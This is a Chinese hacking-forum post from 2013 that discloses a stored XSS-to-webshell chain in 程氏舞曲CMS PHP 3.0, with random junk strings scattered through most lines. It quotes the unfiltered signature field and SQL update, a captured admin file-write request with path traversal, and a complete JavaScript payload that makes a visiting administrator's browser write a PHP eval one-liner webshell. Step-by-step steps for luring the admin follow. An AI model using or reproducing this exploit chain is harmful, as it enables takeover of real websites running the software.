找回密码
 立即注册
查看: 2658|回复: 0
打印 上一主题 下一主题

程氏舞曲CMSPHP3.0 储存型xss getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-6 18:09:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
/ F5 n- x: {8 u/ Z( q5 i  q9 d3 c官网已经修补了,所以重新下了源码: g" {- s/ J  \, d: l
因为 后台登入 还需要认证码 所以 注入就没看了。" @2 V6 N$ B& O
存在 xss
2 a: G2 j8 U* ^  Q漏洞文件 user/member/skin_edit.php8 m8 F+ C) M. J% A( M( `. k: J
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:. e+ A9 w2 C$ C/ v1 ^7 |
  ' t! |  S: b: I& s9 J( E; Q4 \
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>' b7 R' Y: P. {* K
  ) j: d1 o5 w# }2 l6 u
</textarea></td></tr>
6 j; Z, T. F$ `0 p" z) k- v( H+ m  
( c0 O+ ]9 X5 D4 X: c4 d; P# X             user/do.php
' ^: ^4 x% R; H2 `9 N5 l4 l* F* @5 f$ \3 N" h

9 s/ P6 S* w. g' A; l) `# fif($op=='zl'){ //资料6 ]/ x3 t* w8 s" V* }5 t; |' q" F2 `9 ?
  8 U9 b1 L- V- n5 E! P: g
             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) : l' Z% z5 ~8 _( n9 H, [
             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
4 q# K3 W+ C6 S  
4 f  g3 {' e: Y& H             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
+ j8 b+ Q2 y* \$ p' P  
8 J- l6 d* n. K8 @, |+ I3 p             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
1 }% d4 p) K/ \             where CS_Name='".$cscms_name."'";
- z" V6 ^! v1 j$ {% t9 [0 w% Y  . {: f4 C( o8 X6 B/ |& n  v5 [& l6 J
             if($db->query($sql)){! U! A( U  R  i' A
  
  }# I. R8 r9 u7 Z              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
( M% C4 W& ~$ K, `  7 y3 n3 E/ L& c
             }else{* n1 P# ^* g8 y' u- E
  
. c# R9 p9 _. S              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
- M6 ^3 x! n! R- n  8 N) \2 O6 }+ i! F$ @8 L
             }: r7 |3 t4 t2 }
6 E% N' W: b! w: ?! |' X
3 v5 T/ E9 h/ a1 S  J
没有 过滤导致xss产生。
: X3 k  z2 v+ j5 _# m后台 看了下 很奇葩的是可以写任意格式文件。。  H8 B2 l! R: ?4 S
抓包。。
+ r* F# o2 x) d& M
9 T0 `0 Q6 {% N, d
/ C4 z- U  V6 W) M本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
7 B9 k7 ?# j$ p2 s3 Y  
( k; w& E4 ^2 P6 _7 dAccept: text/html, application/xhtml+xml, */*
4 P% R1 L+ T4 ~0 V  b* w  
$ Y/ m2 \/ w( e) X) e9 xReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php0 T# ^  M  U; I' b6 p0 A
  
: U4 x. p, G( y9 lAccept-Language: zh-CN7 I) p  z0 c% |% @: P2 z& `
  
; \) ^) d' @$ }! Y+ c; QUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
5 e) L0 |; B' b% E3 S$ A( k, K  {  
- _# _2 t& |4 O" vContent-Type: application/x-www-form-urlencoded9 j/ ~  }/ U) B5 r+ E# f& s
  3 x4 M6 f% C: q+ D
Accept-Encoding: gzip, deflate
3 A! V# L9 r% w* \: [3 X# [, X( m  
0 N) F+ m& a) |& s5 _3 }Host: 127.0.0.15 a- d1 q, i5 l0 D9 q$ g0 G! D
  
% z: r  q6 L5 V2 i2 pContent-Length: 38
5 ~& f# g) p) ]  
" f3 i: e/ Z0 c  RDNT: 1
/ x. e2 b7 q: @  3 e/ n: \% ~4 W. K! [0 t' P& X1 u
Connection: Keep-Alive: J1 s" Q* ]3 B
  4 o* V) r8 g( G
Cache-Control: no-cache
" u9 ~% o" N6 L7 {& G' S  4 g$ S8 G) ?/ a; s. o
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594$ S0 ~% S7 D& G/ W# X
  
4 H6 C' y  E2 {$ K2 k  Q! w* a6 q1 m6 j8 n: z- |( r7 l5 m
name=aaa.php&content=%3Cs%3E%3Ca%25%3E& M9 \7 ]$ s! m% c. G+ H! u& D
" S( p- E  i8 q8 S) m- H5 l9 U
: `, J. \  |% h8 ]" f) T

" [6 B8 P- j  X) S- q于是 构造js如下。
4 i0 T; c% P! }7 j3 F0 p/ i; p0 p4 p5 {+ S
本帖隐藏的内容<script>
! `, @5 Z# ]& `5 _thisTHost = top.location.hostname;
! z3 M4 g9 K1 p* G  
$ \  ]6 F0 H) j! j4 F: X# M* a- s+ U9 ZthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
& u4 X# `$ J+ S/ e& u& G  & B, u' l  I+ B6 [! \1 ~8 w
function PostSubmit(url, data, msg) { 2 @1 C* y$ {+ {! X0 G
    var postUrl = url;
* L% Z* n1 |. \& A, A; S7 [  ' ?8 b# m+ H2 b6 n1 m+ R
    var postData = data;
3 h) G. }4 B6 B, l( s5 \$ H/ A    var msgData = msg;
2 {6 W5 M4 r, b/ l8 {2 f    var ExportForm = document.createElement("FORM"); ! M; C, y% Z6 [+ l* U( W
    document.body.appendChild(ExportForm);
) y9 U  n$ A) Y: y) l# p    ExportForm.method = "POST"; 9 \, b5 d& X+ D; i+ _  z; ^
    var newElement = document.createElement("input");
" T& P/ b8 [( i: O, _    newElement.setAttribute("name", "name");
9 @' b6 u0 T' V+ }+ R# T' g    newElement.setAttribute("type", "hidden"); , u, {/ ?$ P/ m+ i4 x" g/ R
    var newElement2 = document.createElement("input"); 5 h: g/ }7 k; _* ^$ g( j- v
    newElement2.setAttribute("name", "content");
# u! e8 ?. m8 S' k    newElement2.setAttribute("type", "hidden"); 9 d4 P) g, I, }( V0 l
    ExportForm.appendChild(newElement);
, G( U- E- X3 N6 s  T. D+ |4 h% ]( L    ExportForm.appendChild(newElement2);
5 f# ]( ~0 G% K' E" M1 E! o    newElement.value = postData;
9 m! ]6 |) \( Z( Y: G. O! C  _    newElement2.value = msgData; " h7 p& ^6 i) s3 E: X3 w' ~) Z
    ExportForm.action = postUrl; : m6 A! @2 M5 B+ {/ \5 O+ x
    ExportForm.submit();
# \3 m& Z8 r0 B9 u; ?& Z; ]. I7 o};4 o- h: R8 j! I: m# w
  
: {  u+ p+ d8 t- p! cPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");) M& D* R- i* Y  t7 i
  
1 x/ d8 b5 P: b, I* ^# `  r+ w8 {</script>
% b7 X/ a/ n3 g) E3 O" ]9 a) V! a! p8 S

1 \% N5 [" }5 i! e7 a. `/ N8 e8 ~* H3 p! z- n* P8 t1 q& T
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
8 x1 L; Q  Q  ]; [* A/ v用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)
' @0 N. z, P0 T& _) y4 i7 \2 r就会 在 skins\index\html\目录下生成 roker.php 一句话。
2 V$ M! C- c' @/ y8 P$ g8 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表